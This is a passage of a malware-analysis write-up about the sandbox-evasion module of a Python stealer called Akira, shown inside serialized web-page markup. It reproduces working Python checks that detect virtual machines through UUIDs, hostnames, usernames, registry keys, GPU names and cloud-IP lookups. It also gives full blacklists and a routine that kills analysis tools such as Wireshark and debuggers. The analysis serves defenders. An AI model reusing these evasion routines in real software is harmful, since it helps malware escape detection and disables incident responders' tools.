except:\n",[1588,11116,11118],{"class":1590,"line":11117},24,[1588,11119,11120],{},"            return False\n",[1588,11122,11124],{"class":1590,"line":11123},25,[1588,11125,11126],{},"    return False\n",[1671,11128,11130],{"id":11129},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware UUID",[806,11132,1677],{},[806,11134,11135],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[1545,11137,11139],{"className":10501,"code":11138,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[1524,11140,11141,11145,11150,11155,11160,11165,11170,11175,11180,11185],{"__ignoreMap":863},[1588,11142,11143],{"class":1590,"line":1591},[1588,11144,10991],{},[1588,11146,11147],{"class":1590,"line":864},[1588,11148,11149],{},"def checkUUID() -> bool:\n",[1588,11151,11152],{"class":1590,"line":1814},[1588,11153,11154],{},"    try:\n",[1588,11156,11157],{"class":1590,"line":1831},[1588,11158,11159],{},"        raw = subprocess.run(\n",[1588,11161,11162],{"class":1590,"line":2135},[1588,11163,11164],{},"            \"wmic csproduct get uuid\", shell=True,\n",[1588,11166,11167],{"class":1590,"line":2141},[1588,11168,11169],{},"            capture_output=True\n",[1588,11171,11172],{"class":1590,"line":2147},[1588,11173,11174],{},"        
).stdout.splitlines()[2].decode().strip()\n",[1588,11176,11177],{"class":1590,"line":2153},[1588,11178,11179],{},"    except:\n",[1588,11181,11182],{"class":1590,"line":2159},[1588,11183,11184],{},"        raw = \"\"\n",[1588,11186,11187],{"class":1590,"line":2165},[1588,11188,11189],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[806,11191,11192],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to extract the UUID of the host machine. The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[1671,11194,11196],{"id":11195},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[806,11198,1677],{},[806,11200,11201,11202,11205],{},"The system hostname, accessed via the ",[1524,11203,11204],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[1545,11207,11209],{"className":10501,"code":11208,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... 
dozens more entries ...\n)\n",[1524,11210,11211,11215,11220,11225,11230,11234,11239,11244,11249,11254],{"__ignoreMap":863},[1588,11212,11213],{"class":1590,"line":1591},[1588,11214,10991],{},[1588,11216,11217],{"class":1590,"line":864},[1588,11218,11219],{},"def checkComputerName() -> bool:\n",[1588,11221,11222],{"class":1590,"line":1814},[1588,11223,11224],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[1588,11226,11227],{"class":1590,"line":1831},[1588,11228,11229],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1588,11231,11232],{"class":1590,"line":2135},[1588,11233,9865],{"emptyLinePlaceholder":508},[1588,11235,11236],{"class":1590,"line":2141},[1588,11237,11238],{},"BLACKLISTED_COMPUTERNAMES = (\n",[1588,11240,11241],{"class":1590,"line":2147},[1588,11242,11243],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[1588,11245,11246],{"class":1590,"line":2153},[1588,11247,11248],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[1588,11250,11251],{"class":1590,"line":2159},[1588,11252,11253],{},"    # ... dozens more entries ...\n",[1588,11255,11256],{"class":1590,"line":2165},[1588,11257,11258],{},")\n",[806,11260,11261],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[1671,11263,11265],{"id":11264},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[806,11267,1677],{},[806,11269,11270],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". 
These names are low-entropy and often hardcoded in open source sandbox environments.",[1545,11272,11274],{"className":10501,"code":11273,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[1524,11275,11276,11280,11285,11290,11295,11299,11304,11309,11314,11319],{"__ignoreMap":863},[1588,11277,11278],{"class":1590,"line":1591},[1588,11279,10991],{},[1588,11281,11282],{"class":1590,"line":864},[1588,11283,11284],{},"def checkUsers() -> bool:\n",[1588,11286,11287],{"class":1590,"line":1814},[1588,11288,11289],{},"    user = os.getlogin().lower()\n",[1588,11291,11292],{"class":1590,"line":1831},[1588,11293,11294],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[1588,11296,11297],{"class":1590,"line":2135},[1588,11298,9865],{"emptyLinePlaceholder":508},[1588,11300,11301],{"class":1590,"line":2141},[1588,11302,11303],{},"BLACKLISTED_USERS = (\n",[1588,11305,11306],{"class":1590,"line":2147},[1588,11307,11308],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[1588,11310,11311],{"class":1590,"line":2153},[1588,11312,11313],{},"    'a.monaldo','tvm',\n",[1588,11315,11316],{"class":1590,"line":2159},[1588,11317,11318],{},"    # ... 
30+ more entries ...\n",[1588,11320,11321],{"class":1590,"line":2165},[1588,11322,11258],{},[806,11324,11325],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[1671,11327,11329],{"id":11328},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[806,11331,1677],{},[806,11333,11334,11335,11338],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. In this case, a simple HTTP request is made to ",[1524,11336,11337],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[1545,11340,11342],{"className":10501,"code":11341,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[1524,11343,11344,11348,11353,11358,11362,11367,11372,11377,11382,11386],{"__ignoreMap":863},[1588,11345,11346],{"class":1590,"line":1591},[1588,11347,10991],{},[1588,11349,11350],{"class":1590,"line":864},[1588,11351,11352],{},"def checkHosting() -> bool:\n",[1588,11354,11355],{"class":1590,"line":1814},[1588,11356,11357],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[1588,11359,11360],{"class":1590,"line":1831},[1588,11361,11154],{},[1588,11363,11364],{"class":1590,"line":2135},[1588,11365,11366],{},"        return http.request(\n",[1588,11368,11369],{"class":1590,"line":2141},[1588,11370,11371],{},"            'GET',\n",[1588,11373,11374],{"class":1590,"line":2147},[1588,11375,11376],{},"            'http://ip-api.com/line/?fields=hosting'\n",[1588,11378,11379],{"class":1590,"line":2153},[1588,11380,11381],{},"        ).data.decode().strip() == 
'true'\n",[1588,11383,11384],{"class":1590,"line":2159},[1588,11385,11179],{},[1588,11387,11388],{"class":1590,"line":2165},[1588,11389,11390],{},"        return False\n",[806,11392,11393],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[1671,11395,11397],{"id":11396},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[806,11399,1677],{},[806,11401,11402,11403,11406],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign HTTPS request to a random subdomain under ",[1524,11404,11405],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed. Note, however, that the snippet below returns True (the value isVM treats as an analysis indicator) only when the request to the random, non-existent domain succeeds, and returns False when it fails; read literally, the check therefore flags environments where a fake network service answers arbitrary HTTPS requests rather than ones where the connection is blocked.",[1545,11408,11410],{"className":10501,"code":11409,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return True\n",[1524,11411,11412,11416,11421,11426,11430,11435,11439,11443],{"__ignoreMap":863},[1588,11413,11414],{"class":1590,"line":1591},[1588,11415,10991],{},[1588,11417,11418],{"class":1590,"line":864},[1588,11419,11420],{},"def checkHTTPSimulation() -> bool:\n",[1588,11422,11423],{"class":1590,"line":1814},[1588,11424,11425],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[1588,11427,11428],{"class":1590,"line":1831},[1588,11429,11154],{},[1588,11431,11432],{"class":1590,"line":2135},[1588,11433,11434],{},"        http.request('GET', 
f'https://blank-{Utils.GetRandomString()}.in')\n",[1588,11436,11437],{"class":1590,"line":2141},[1588,11438,11179],{},[1588,11440,11441],{"class":1590,"line":2147},[1588,11442,11390],{},[1588,11444,11445],{"class":1590,"line":2153},[1588,11446,11447],{},"    return True\n",[806,11449,11450],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[1671,11452,11454],{"id":11453},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[806,11456,1677],{},[806,11458,11459,11460,11463],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[1524,11461,11462],{},"wmic"," for suspicious GPU strings.",[1545,11465,11467],{"className":10501,"code":11466,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[1524,11468,11469,11473,11478,11483,11488,11493,11498,11503,11507,11511,11516,11521,11526,11531,11536,11541],{"__ignoreMap":863},[1588,11470,11471],{"class":1590,"line":1591},[1588,11472,10991],{},[1588,11474,11475],{"class":1590,"line":864},[1588,11476,11477],{},"def checkRegistry() -> 
bool:\n",[1588,11479,11480],{"class":1590,"line":1814},[1588,11481,11482],{},"    r1 = subprocess.run(\n",[1588,11484,11485],{"class":1590,"line":1831},[1588,11486,11487],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[1588,11489,11490],{"class":1590,"line":2135},[1588,11491,11492],{},"        capture_output=True, shell=True)\n",[1588,11494,11495],{"class":1590,"line":2141},[1588,11496,11497],{},"    r2 = subprocess.run(\n",[1588,11499,11500],{"class":1590,"line":2147},[1588,11501,11502],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[1588,11504,11505],{"class":1590,"line":2153},[1588,11506,11492],{},[1588,11508,11509],{"class":1590,"line":2159},[1588,11510,9865],{"emptyLinePlaceholder":508},[1588,11512,11513],{"class":1590,"line":2165},[1588,11514,11515],{},"    # GPU name check\n",[1588,11517,11518],{"class":1590,"line":11039},[1588,11519,11520],{},"    gpu_out = subprocess.run(\n",[1588,11522,11523],{"class":1590,"line":11045},[1588,11524,11525],{},"        \"wmic path win32_VideoController get name\",\n",[1588,11527,11528],{"class":1590,"line":11051},[1588,11529,11530],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[1588,11532,11533],{"class":1590,"line":11057},[1588,11534,11535],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[1588,11537,11538],{"class":1590,"line":11063},[1588,11539,11540],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[1588,11542,11543],{"class":1590,"line":11069},[1588,11544,11545],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[806,11547,11548],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[1671,11550,11552],{"id":11551},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real Time",[806,11554,1677],{},[806,11556,11557],{},"Rather than only evading detection passively, Akira 
goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[1545,11559,11561],{"className":10501,"code":11560,"language":10503,"meta":863,"style":863},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... dozens more ...\n  'glasswire','requestly'\n)\n",[1524,11562,11563,11567,11572,11577,11581,11586,11591,11596,11601],{"__ignoreMap":863},[1588,11564,11565],{"class":1590,"line":1591},[1588,11566,10991],{},[1588,11568,11569],{"class":1590,"line":864},[1588,11570,11571],{},"def killTasks() -> None:\n",[1588,11573,11574],{"class":1590,"line":1814},[1588,11575,11576],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[1588,11578,11579],{"class":1590,"line":1831},[1588,11580,9865],{"emptyLinePlaceholder":508},[1588,11582,11583],{"class":1590,"line":2135},[1588,11584,11585],{},"BLACKLISTED_TASKS = (\n",[1588,11587,11588],{"class":1590,"line":2141},[1588,11589,11590],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[1588,11592,11593],{"class":1590,"line":2147},[1588,11594,11595],{},"  # ... dozens more ...\n",[1588,11597,11598],{"class":1590,"line":2153},[1588,11599,11600],{},"  'glasswire','requestly'\n",[1588,11602,11603],{"class":1590,"line":2159},[1588,11604,11258],{},[806,11606,11607],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[806,11609,11610],{},[1736,11611,11612],{},"Summary",[806,11614,11615],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. 
These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[806,11617,11618],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[1671,11620,11622],{"id":11621},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[806,11624,1677],{},[806,11626,11627],{},[1736,11628,11629],{},"Blacklisted Hardware UUIDs",[1545,11631,11634],{"className":11632,"code":11633,"language":916},[1548],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    
'481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[1524,11635,11633],{"__ignoreMap":863},[806,11637,11638],{},[1736,11639,11640],{},"Blacklisted Computer Names",[1545,11642,11645],{"className":11643,"code":11644,"language":916},[1548],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[1524,11646,11644],{"__ignoreMap":863},[806,11648,11649],{},[1736,11650,11651],{},"Blacklisted User Accounts",[1545,11653,11656],{"className":11654,"code":11655,"language":916},[1548],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[1524,11657,11655],{"__ignoreMap":863},[806,11659,11660],{},[1736,11661,11662],{},"Blacklisted Analysis‐Tool Processes",[1545,11664,11667],{"className":11665,"code":11666,"language":916},[1548],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    
'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[1524,11668,11666],{"__ignoreMap":863},[806,11670,11671],{},[1736,11672,11673],{},"Core Detection Methods",[1545,11675,11677],{"className":10501,"code":11676,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = 
subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[1524,11678,11679,11683,11687,11692,11696,11700,11705,11710,11715,11719,11723,11727,11731,11735,11739,11744,11749,11753,11757,11761,11766,11771,11775,11779,11783,11788,11793,11798,11803,11809,11814,11819,11824,11829,11834,11839,11845,11851,11857,11862,11867,11872,11877,11883,11888,11893,11898,11903,11908,11913,11919,11925,11931,11937,11942,11947,11953,11959,11965,11971,11976,11981,11987,11992,11997,12003,12009,12015,12020,12026,12032,12037,12043,12049,12054,12059,12064,12070],{"__ignoreMap":863},[1588,11680,11681],{"class":1590,"line":1591},[1588,11682,10991],{},[1588,11684,11685],{"class":1590,"line":864},[1588,11686,11149],{},[1588,11688,11689],{"class":1590,"line":1814},[1588,11690,11691],{},"    \"\"\"WMIC hardware UUID against known VM 
IDs.\"\"\"\n",[1588,11693,11694],{"class":1590,"line":1831},[1588,11695,11154],{},[1588,11697,11698],{"class":1590,"line":2135},[1588,11699,11159],{},[1588,11701,11702],{"class":1590,"line":2141},[1588,11703,11704],{},"            \"wmic csproduct get uuid\",\n",[1588,11706,11707],{"class":1590,"line":2147},[1588,11708,11709],{},"            shell=True, capture_output=True\n",[1588,11711,11712],{"class":1590,"line":2153},[1588,11713,11714],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[1588,11716,11717],{"class":1590,"line":2159},[1588,11718,11179],{},[1588,11720,11721],{"class":1590,"line":2165},[1588,11722,11184],{},[1588,11724,11725],{"class":1590,"line":11039},[1588,11726,11189],{},[1588,11728,11729],{"class":1590,"line":11045},[1588,11730,9865],{"emptyLinePlaceholder":508},[1588,11732,11733],{"class":1590,"line":11051},[1588,11734,10991],{},[1588,11736,11737],{"class":1590,"line":11057},[1588,11738,11219],{},[1588,11740,11741],{"class":1590,"line":11063},[1588,11742,11743],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[1588,11745,11746],{"class":1590,"line":11069},[1588,11747,11748],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1588,11750,11751],{"class":1590,"line":11075},[1588,11752,9865],{"emptyLinePlaceholder":508},[1588,11754,11755],{"class":1590,"line":11081},[1588,11756,10991],{},[1588,11758,11759],{"class":1590,"line":11087},[1588,11760,11284],{},[1588,11762,11763],{"class":1590,"line":11093},[1588,11764,11765],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[1588,11767,11768],{"class":1590,"line":11099},[1588,11769,11770],{},"    return os.getlogin().lower() in 
VmProtect.BLACKLISTED_USERS\n",[1588,11772,11773],{"class":1590,"line":11105},[1588,11774,9865],{"emptyLinePlaceholder":508},[1588,11776,11777],{"class":1590,"line":11111},[1588,11778,10991],{},[1588,11780,11781],{"class":1590,"line":11117},[1588,11782,11352],{},[1588,11784,11785],{"class":1590,"line":11123},[1588,11786,11787],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[1588,11789,11791],{"class":1590,"line":11790},26,[1588,11792,11357],{},[1588,11794,11796],{"class":1590,"line":11795},27,[1588,11797,11154],{},[1588,11799,11801],{"class":1590,"line":11800},28,[1588,11802,11366],{},[1588,11804,11806],{"class":1590,"line":11805},29,[1588,11807,11808],{},"            'GET', 'http://ip-api.com/line/?fields=hosting'\n",[1588,11810,11812],{"class":1590,"line":11811},30,[1588,11813,11381],{},[1588,11815,11817],{"class":1590,"line":11816},31,[1588,11818,11179],{},[1588,11820,11822],{"class":1590,"line":11821},32,[1588,11823,11390],{},[1588,11825,11827],{"class":1590,"line":11826},33,[1588,11828,9865],{"emptyLinePlaceholder":508},[1588,11830,11832],{"class":1590,"line":11831},34,[1588,11833,10991],{},[1588,11835,11837],{"class":1590,"line":11836},35,[1588,11838,11420],{},[1588,11840,11842],{"class":1590,"line":11841},36,[1588,11843,11844],{},"    \"\"\"\n",[1588,11846,11848],{"class":1590,"line":11847},37,[1588,11849,11850],{},"    Attempt TLS to random subdomain.\n",[1588,11852,11854],{"class":1590,"line":11853},38,[1588,11855,11856],{},"    Failure → possible HTTPS interception/sandbox.\n",[1588,11858,11860],{"class":1590,"line":11859},39,[1588,11861,11844],{},[1588,11863,11865],{"class":1590,"line":11864},40,[1588,11866,11425],{},[1588,11868,11870],{"class":1590,"line":11869},41,[1588,11871,11154],{},[1588,11873,11875],{"class":1590,"line":11874},42,[1588,11876,11434],{},[1588,11878,11880],{"class":1590,"line":11879},43,[1588,11881,11882],{},"        return 
True\n",[1588,11884,11886],{"class":1590,"line":11885},44,[1588,11887,11179],{},[1588,11889,11891],{"class":1590,"line":11890},45,[1588,11892,11390],{},[1588,11894,11896],{"class":1590,"line":11895},46,[1588,11897,9865],{"emptyLinePlaceholder":508},[1588,11899,11901],{"class":1590,"line":11900},47,[1588,11902,10991],{},[1588,11904,11906],{"class":1590,"line":11905},48,[1588,11907,11477],{},[1588,11909,11911],{"class":1590,"line":11910},49,[1588,11912,11844],{},[1588,11914,11916],{"class":1590,"line":11915},50,[1588,11917,11918],{},"    Look for VirtualBox/VMware in:\n",[1588,11920,11922],{"class":1590,"line":11921},51,[1588,11923,11924],{},"    - Registry driver entries\n",[1588,11926,11928],{"class":1590,"line":11927},52,[1588,11929,11930],{},"    - Video card name via WMIC\n",[1588,11932,11934],{"class":1590,"line":11933},53,[1588,11935,11936],{},"    - Presence of VM-specific folders\n",[1588,11938,11940],{"class":1590,"line":11939},54,[1588,11941,11844],{},[1588,11943,11945],{"class":1590,"line":11944},55,[1588,11946,11482],{},[1588,11948,11950],{"class":1590,"line":11949},56,[1588,11951,11952],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[1588,11954,11956],{"class":1590,"line":11955},57,[1588,11957,11958],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[1588,11960,11962],{"class":1590,"line":11961},58,[1588,11963,11964],{},"        shell=True, capture_output=True\n",[1588,11966,11968],{"class":1590,"line":11967},59,[1588,11969,11970],{},"    )\n",[1588,11972,11974],{"class":1590,"line":11973},60,[1588,11975,11497],{},[1588,11977,11979],{"class":1590,"line":11978},61,[1588,11980,11952],{},[1588,11982,11984],{"class":1590,"line":11983},62,[1588,11985,11986],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 
